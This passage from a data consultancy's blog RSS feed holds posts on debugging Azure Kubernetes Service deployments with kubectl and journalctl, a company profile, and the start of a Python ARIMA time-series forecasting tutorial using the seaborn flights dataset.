&lt;p&gt;Exclusive discounts: Gain 30% off the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production Conference (8–9 October 2025)&lt;/a&gt; and 30% off any of our public &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;online courses.&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Don’t miss out - &lt;strong&gt;register now&lt;/strong&gt; &lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;at this link&lt;/a&gt; and join us for the next session on 18 September!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Beyond the AKS Basics: Practical Tips for Your Kubernetes Journey</title><link>https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/</link><pubDate>Thu, 11 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="beyond-the-aks-basics-practical-tips-for-your-kubernetes-journey"&gt;Beyond the AKS Basics: Practical Tips for Your Kubernetes Journey&lt;/h2&gt;
&lt;p&gt;I recently completed Microsoft&amp;rsquo;s Kubernetes on Azure course
(&lt;a href="https://web.archive.org/web/20230815194156/https://azurecomcdn.azureedge.net/cvt-654ff0c11572f0043b19dd8da7fed50d177ba3060e149008310c11d8b38e15c1/mediahandler/files/resourcefiles/kubernetes-learning-path/Kubernetes%20Learning%20Path_Version%202.0.pdf/" rel="external"&gt;here is an archived version&lt;/a&gt;) and while it provided a solid
foundation, I wanted to share some practical insights and debugging
techniques that weren&amp;rsquo;t covered. This post dives into real-world scenarios with
Azure Kubernetes Service (AKS), offering tips for debugging containers and nodes,
tackling tricky issues like Posit Workbench session failures, and leveraging tools
like Packer. Plus, we&amp;rsquo;ll show you an example of how we debugged an initially
perplexing and frustrating development issue using useful commands.&lt;/p&gt;
&lt;p&gt;Following this course, I deployed a large Azure-hosted Posit Workbench deployment.
This involved VMs coordinating Kubernetes jobs for user development environments
(like RStudio), behind a reverse proxy.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-beyond-kubernetes-basics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="azure-free-trial-a-great-starting-point"&gt;Azure Free Trial: A Great Starting Point&lt;/h3&gt;
&lt;p&gt;First things first, if you&amp;rsquo;re new to Azure, don&amp;rsquo;t forget to take advantage of
the various free trials offered. Sometimes one and twelve month free trials are offered.
It&amp;rsquo;s an excellent way to get hands-on experience with AKS. See &lt;a href="https://azure.microsoft.com/free/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="level-up-your-debugging-skills"&gt;Level Up Your Debugging Skills&lt;/h3&gt;
&lt;h4 id="peeking-inside-containers"&gt;Peeking Inside Containers&lt;/h4&gt;
&lt;p&gt;Ever had a Kubernetes session refuse to start and wondered what&amp;rsquo;s
going on under the hood? A super useful command is:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl run -it --image &amp;lt;your_image&amp;gt; &amp;lt;your_container_name&amp;gt; -- /bin/bash&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This lets you spin up a temporary container based on your image and get a shell inside.
For example, when troubleshooting why some Kubernetes jobs for Posit Workbench weren’t starting,
this command came in handy:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl run -it --image ${AZURE_CONTAINER_REPOSITORY_NAME}.azurecr.io/${IMAGE_NAME} testme -- /bin/bash&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In the above example, we’re using custom-built container images which we pushed to
Azure Container Registry, which are based on &lt;a href="https://hub.docker.com/r/rstudio/workbench-session" rel="external"&gt;ones published by Posit&lt;/a&gt; and use Packer to
build in extra customizations. Keep reading on for more on Packer!&lt;/p&gt;
&lt;h3 id="diving-into-nodes"&gt;Diving into Nodes&lt;/h3&gt;
&lt;p&gt;Surprisingly, even with a managed service like AKS, you can debug the underlying nodes!&lt;/p&gt;
&lt;p&gt;This proved invaluable when I needed to check the software version in use for
implementing an NFS share. It lets you use a shell on the node itself:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl debug node/&amp;lt;your_node_name&amp;gt; -it --image=ubuntu&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Learn more about this powerful technique &lt;a href="https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/" rel="external"&gt;in the Kubernetes documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="logs"&gt;Logs&lt;/h3&gt;
&lt;p&gt;Kubernetes logs are essential, but don&amp;rsquo;t forget the logs of other components
in your system outside of Kubernetes also. Many “always-on” Linux-based
applications rely on &lt;code&gt;systemctl&lt;/code&gt; and &lt;code&gt;journalctl&lt;/code&gt;. This allows you to view logs
filtered by service unit (your application), time range, and specific keywords.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo journalctl -u $SERVICE_UNIT_NAME --since &amp;quot;$TIME_RANGE&amp;quot; -g &amp;quot;$SEARCH_TERM&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;For example, when a certain Posit Workbench session (corresponding to a Kubernetes job)
was having issues earlier that day, I could quickly find relevant events on the application&amp;rsquo;s
virtual machine using this Linux command:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo journalctl -u rstudio-launcher --since today -g $SESSION_ID&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This can often provide valuable context that complements your Kubernetes logs.&lt;/p&gt;
&lt;h3 id="the-unexpected-culprit-looking-beyond-kubernetes"&gt;The Unexpected Culprit: Looking Beyond Kubernetes&lt;/h3&gt;
&lt;p&gt;Here&amp;rsquo;s a crucial lesson I learned the hard way. Sometimes, issues aren&amp;rsquo;t
within your Kubernetes cluster at all. We had a setup with a reverse proxy
sitting in front of applications on virtual machines with a Kubernetes backend.
We anticipated users might experience some initial delay when launching jobs due
to system resources. However, we were caught off guard when users started reporting
504 Gateway Timeout errors after exactly two minutes.&lt;/p&gt;
&lt;p&gt;Our initial instinct was to deep-dive into the Kubernetes configurations.
But after some head-scratching, our client pointed out the consistent
two-minute interval. This was the key! It forced us to broaden our investigation
to all components in the request path, even those outside the Kubernetes cluster.&lt;/p&gt;
&lt;p&gt;Our troubleshooting process involved meticulously listing every component
from the Kubernetes node all the way to the user&amp;rsquo;s browser. We then started checking
timeout settings on each. Guess what? The reverse proxy (more specifically
an Azure Application Gateway), sitting innocently in front of our VMs and the rest of
our system had a default two-minute connection timeout. If allocating a job to a node
took longer than that, the proxy would prematurely close the connection, resulting in the dreaded 504 error.&lt;/p&gt;
&lt;p&gt;This experience underscored the importance of considering the entire
system architecture when debugging. Don&amp;rsquo;t just focus on Kubernetes – think about
load balancers, proxies, firewalls, and any other piece of infrastructure that might
be interacting with your cluster. We were lucky the problematic component was one of the first we checked!&lt;/p&gt;
&lt;h3 id="automating-image-creation-with-packer"&gt;Automating Image Creation with Packer&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://jmorano.moretrix.com/2022/04/using-ansible-to-finalize-hashicorp-packer-images/" rel="external"&gt;Packer&lt;/a&gt; is a fantastic tool for building identical machine
images for multiple platforms. These can – for example – then be
pushed to Azure Container Registry for use in Azure Kubernetes Service, or used on VMs in Azure.&lt;/p&gt;
&lt;p&gt;The real power comes from the ability to then run Ansible
playbooks on top of a base image. This allows us to automate
the installation of software and configuration, leveraging existing Ansible
roles we have developed in-house which weren’t necessarily developed for Kubernetes sessions.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Kubernetes success goes beyond cluster configs. From debugging containers and nodes to tracing issues through proxies, real-world AKS work demands a full-system view. With the right tools and mindset, you’ll turn tricky problems into valuable lessons.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Who We Are and What We Do: Inside Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/inside-jumping-rivers/</link><pubDate>Tue, 09 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/inside-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/inside-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/inside-jumping-rivers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we combine engineering,
automation, and analytics to streamline your data workflows and make
them more efficient. We take care of the tasks you don’t have the time
or capacity for, improve processes you might not even know could be optimised,
and work alongside your team to make your data and engineering operations easier
and more effective. From pioneering startups to established organisations,
we help our clients harness the power of data to work smarter and faster.&lt;/p&gt;
&lt;h2 id="who-we-are"&gt;Who We Are&lt;/h2&gt;
&lt;p&gt;We’re a team of passionate problem-solvers, technologists, and analytics experts. Jumping Rivers isn’t your typical consultancy; we turn technical expertise and hands-on experience into measurable impact for our clients.&lt;/p&gt;
&lt;h2 id="our-expertise"&gt;Our Expertise&lt;/h2&gt;
&lt;p&gt;Our team spans multiple disciplines, making us uniquely positioned to tackle any data challenge:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Science:&lt;/strong&gt; AI, predictive modelling, machine learning, automation, and advanced analytics that uncover actionable insights.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Engineering:&lt;/strong&gt; Robust, scalable pipelines, infrastructure, and automation to ensure your data is accurate, accessible, and efficient.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud &amp;amp; Infrastructure:&lt;/strong&gt; Expertise spans leading cloud platforms including AWS, Azure, Kubernetes, and Databricks. We design and manage secure, scalable, and high-performance cloud solutions that support complex pipelines, automated workflows, collaborative analytics, and AI/ML deployment. This ensures your data is reliable, accessible, and ready to drive actionable insights, both now and as your organisation grows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dashboards &amp;amp; Shiny:&lt;/strong&gt; Development, maintenance, and support of Shiny applications and interactive dashboards, delivering insights in an accessible and actionable format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Training:&lt;/strong&gt; Bespoke sessions in R, Python, SQL, and more, empowering your team with the skills to thrive in a data-driven world.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="our-partners"&gt;Our Partners&lt;/h2&gt;
&lt;p&gt;We collaborate with industry leaders like &lt;a href="http://posit.co/" rel="external"&gt;Posit&lt;/a&gt; and
&lt;a href="https://www.databricks.com/" rel="external"&gt;Databricks&lt;/a&gt;,
giving us and our clients access to cutting-edge tools, platforms, and
innovations. These partnerships help us stay ahead of the
curve and ensure our work is as forward-thinking as it is practical.&lt;/p&gt;
&lt;h2 id="how-we-handle-enquiries"&gt;How We Handle Enquiries&lt;/h2&gt;
&lt;p&gt;We do things differently. When a client reaches out,
our process is designed to ensure their specific needs are met:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Prompt Email Response:&lt;/strong&gt; We acknowledge every enquiry quickly and professionally.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Discovery Meeting:&lt;/strong&gt; We discuss the client’s challenges, goals, and context to fully understand the problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom Proposal:&lt;/strong&gt; We craft a tailored solution that fits the client’s objectives, budget, and timeline and not a one-size-fits-all approach.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This personalised approach is why clients keep coming back.
We don’t just deliver projects, we deliver results that make
a real difference for teams and organisations.&lt;/p&gt;
&lt;h2 id="shiny-in-production-conference"&gt;Shiny in Production Conference&lt;/h2&gt;
&lt;p&gt;We’re proud to bring the data community together with our annual &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny
in Production&lt;/a&gt; conference. Our next conference takes place &lt;strong&gt;8th–9th October in Newcastle&lt;/strong&gt;,
featuring inspiring talks, hands-on workshops, and unrivalled networking
opportunities with leaders from large organisations.&lt;/p&gt;
&lt;h2 id="why-were-different"&gt;Why We’re Different&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is more than a consultancy. We combine deep technical
expertise with a personalised, client-focused approach. We handle the complex,
time-consuming, and high-skill tasks that make your team’s work easier and
more effective. When you work with us, you’re not just hiring a service,
you’re gaining a partner committed to making your data and engineering
operations smarter, faster, and more impactful.&lt;/p&gt;
&lt;h2 id="our-people-experience-growth-and-teamwork"&gt;Our People: Experience, Growth, and Teamwork&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers, we believe that great work starts with a great environment.
Our team thrives in a supportive, welcoming culture where curiosity is
encouraged, collaboration is the norm, and everyone’s voice is valued.
We place a strong emphasis on team building and shared learning, creating
opportunities for colleagues to grow their skills, share ideas, and tackle
challenges together. It’s a place where innovation, positivity, and
mutual support drive both personal and professional growth.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/inside-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Time Series Forecasting in Python</title><link>https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/</link><pubDate>Thu, 28 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In this post we will be introducing the concept of time series
forecasting, with a focus on the ARIMA framework and how this can be
implemented in Python. We will be using a publicly available data set
and the following open source packages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://seaborn.pydata.org/" rel="external"&gt;seaborn&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/" rel="external"&gt;matplotlib&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.statsmodels.org/stable/index.html" rel="external"&gt;statsmodels&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/" rel="external"&gt;pandas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://numpy.org/" rel="external"&gt;numpy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://scikit-learn.org/stable/" rel="external"&gt;scikit-learn&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="time-series"&gt;Time series&lt;/h2&gt;
&lt;p&gt;In time series analysis we are interested in sequential data made up of
a series of observations taken at regular intervals. Examples include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Weekly hospital occupancy&lt;/li&gt;
&lt;li&gt;Monthly sales figures&lt;/li&gt;
&lt;li&gt;Annual global temperature&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In many cases we want to use the observations up to the present day to
predict (or forecast) the next &lt;em&gt;N&lt;/em&gt; time points. For example, a hospital
could reduce running costs if an appropriate number of beds are
provisioned.&lt;/p&gt;
&lt;p&gt;This is where time series modelling fits in. The most basic time series
model is a simple linear regression, where we assume that the time
series evolves linearly over time. For non-linear time series we can
consider piecewise linear regression.&lt;/p&gt;
&lt;p&gt;What about more complex cases where we want to accurately capture subtle
variations in the data? We will now demonstrate the ARIMA framework in
Python using a real world data set.&lt;/p&gt;
&lt;h2 id="arima"&gt;ARIMA&lt;/h2&gt;
&lt;p&gt;ARIMA stands for “Auto-Regressive Integrated Moving Average” and is made
up of three key parts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Auto-regression&lt;/strong&gt;: captures the relationship between an observation
and the last &lt;em&gt;k&lt;/em&gt; points (often referred to as “lagged” observations).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration&lt;/strong&gt;: accounts for “non-stationary” trends by taking the
difference between consecutive observations (a non-stationary trend
could include an overall upward trend where the mean observation is
increasing over time).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Moving average&lt;/strong&gt;: accounts for the relationship between an
observation and the residual error that would result from using a
moving average model applied to the lagged observations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The three components (AR, I, MA) are controlled by the parameters
(&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;). Setting one of these to zero will eliminate that
component of the model. For example, if the time series already appears
to be stationary we could set &lt;em&gt;d&lt;/em&gt; = 0 so that we do not perform
differencing.&lt;/p&gt;
&lt;p&gt;To demonstrate ARIMA on a real-world example, let’s load in the flights
data set from the &lt;code&gt;seaborn&lt;/code&gt; library:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;seaborn&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flights &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;load_dataset(&lt;span style="color:#a5d6ff"&gt;&amp;#34;flights&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flights&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## year month passengers
## 0 1949 Jan 112
## 1 1949 Feb 118
## 2 1949 Mar 132
## 3 1949 Apr 129
## 4 1949 May 121
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Let’s visualise the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(flights[&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/passengers-1.png" alt="Time series plot displaying the number of flight passengers every month for a 12-year period. We observe a fluctuating seasonal trend with a clear peak in the summer months of each year. Both the annual average and the size of the seasonal fluctuation appear to be increasing over time. At month 0 we observe just over 100 passengers and at month 144 we observe over 400 passengers." /&gt;
&lt;p&gt;The data includes the number of passengers that flew each month over a
period of 12 years. We will start by fitting a model on the full data
set, then try holding out some test data for forecasting.&lt;/p&gt;
&lt;h3 id="data-inspection"&gt;Data inspection&lt;/h3&gt;
&lt;p&gt;We should begin by exploring the time series. There are a number of
questions that could be asked. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is the trend non-stationary?&lt;/li&gt;
&lt;li&gt;Does the plot feature a seasonal variation?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Just from looking at the plot above the answer to both of these
questions is a clear “yes”! But what if the data was more noisy and it
was not clear from a quick visual inspection? In that case we could try
decomposing the time series into the following components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trend&lt;/li&gt;
&lt;li&gt;Seasonal&lt;/li&gt;
&lt;li&gt;Residual (i.e. after we have subtracted the trend and seasonal
components)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Fortunately the &lt;code&gt;statsmodels&lt;/code&gt; library has a &lt;code&gt;seasonal_decompose()&lt;/code&gt;
function for this exact purpose:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.seasonal&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; seasonal_decompose
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flights[&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# convenience variable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;decomposition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; seasonal_decompose(y, period&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For convenience we have assigned the passengers column of the original
&lt;code&gt;DataFrame&lt;/code&gt; to a variable called &lt;code&gt;y&lt;/code&gt;. Because we expect a seasonal
variation in the data we have chosen a period of 12 months. Let’s
inspect the decomposition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;decomposition&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/decomposition-3.png" alt="Four plots arranged vertically showing a breakdown of the flight passengers time series. Viewed from top to bottom: the first panel displays the raw time series; the second panel displays the trend component which is increasing over time at a rate that is close to linear; the third panel displays the repeating seasonal fluctuation, which spans from -50 to +50; and the fourth panel displays the residuals that remain after the trend and seasonal variation have been subtracted. The residuals do not appear random, featuring instead a fluctuating pattern, suggesting that there are additional seasonal effects not accounted for." /&gt;
&lt;ul&gt;
&lt;li&gt;The top panel shows the original raw time series.&lt;/li&gt;
&lt;li&gt;In the second panel we see that there is indeed an increasing trend.
We will therefore need to include some differencing in the model
(&lt;em&gt;d&lt;/em&gt; &amp;gt; 0).&lt;/li&gt;
&lt;li&gt;The third panel shows the repeating seasonal component.&lt;/li&gt;
&lt;li&gt;The fourth panel shows that there is still a non-random residual after
the trend and seasonal component have been subtracted. This can result
from the fact that the seasonal “peaks” in the original plot appear to
grow in amplitude over time (i.e. it is not really a fixed seasonal
pattern).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is also important to study the autocorrelation function (ACF) and
partial autocorrelation function (PACF). Again, the &lt;code&gt;statsmodels&lt;/code&gt;
library has everything we need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The ACF plot shows how correlated observations are with other
observations that are &lt;em&gt;k&lt;/em&gt; time points away (we call this “lag-&lt;em&gt;k&lt;/em&gt;”):&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.graphics.tsaplots&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; plot_acf, plot_pacf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_acf(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;$k$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/acf-5.png" alt="Plot of the autocorrelation function applied to the raw time series data. We observe an autocorrelation of 1 at lag-0, which is guaranteed in autocorrelation plots. The autocorrelation then gradually decreases to roughly 0.5 at lag-20. A shaded confidence region is also plotted, which the autocorrelation drops inside at approximately lag-14, suggesting that the correlation between time points that are separated by more than 14 months is not statistically significant." /&gt;
&lt;ul&gt;
&lt;li&gt;The PACF plot shows the “direct” correlation between observations at
lag-&lt;em&gt;k&lt;/em&gt; after removing the linear dependence of intermediate lags:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_pacf(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;$k$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/pacf-7.png" alt="Plot of the partial autocorrelation function applied to the raw time series data. As expected it starts at value 1 at lag-0, and rapidly drops to within 0.2 at lag-3. The partial autocorrelation remains fluctuating between -0.2 and +0.2 (aside from a few outliers) until lag-22. This suggests that the direct correlation, after the linear dependence of intermediate lags is subtracted, between time points that are separated by more than two months is statistically insigificant." /&gt;
&lt;p&gt;Both plots start with a lag of 0, where the correlation is always 1. The
ACF and PACF then typically drop down to close to zero. The point at
which this happens can help to inform the values for our &lt;em&gt;p&lt;/em&gt; and &lt;em&gt;q&lt;/em&gt;
parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The value of &lt;em&gt;k&lt;/em&gt; at which the ACF reduces to statistically
insignificant values is regarded as a good choice for the &lt;em&gt;q&lt;/em&gt;
parameter. From the plot we see the ACF drops close to the confidence
region at approximately &lt;em&gt;k&lt;/em&gt; = 10.&lt;/li&gt;
&lt;li&gt;The value of &lt;em&gt;k&lt;/em&gt; at which the PACF appears to drop close to 0 is a
sensible choice for the &lt;em&gt;p&lt;/em&gt; parameter. Here the value &lt;em&gt;k&lt;/em&gt; = 2 appears
reasonable.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are really just educated guesses. In practice it would be worth
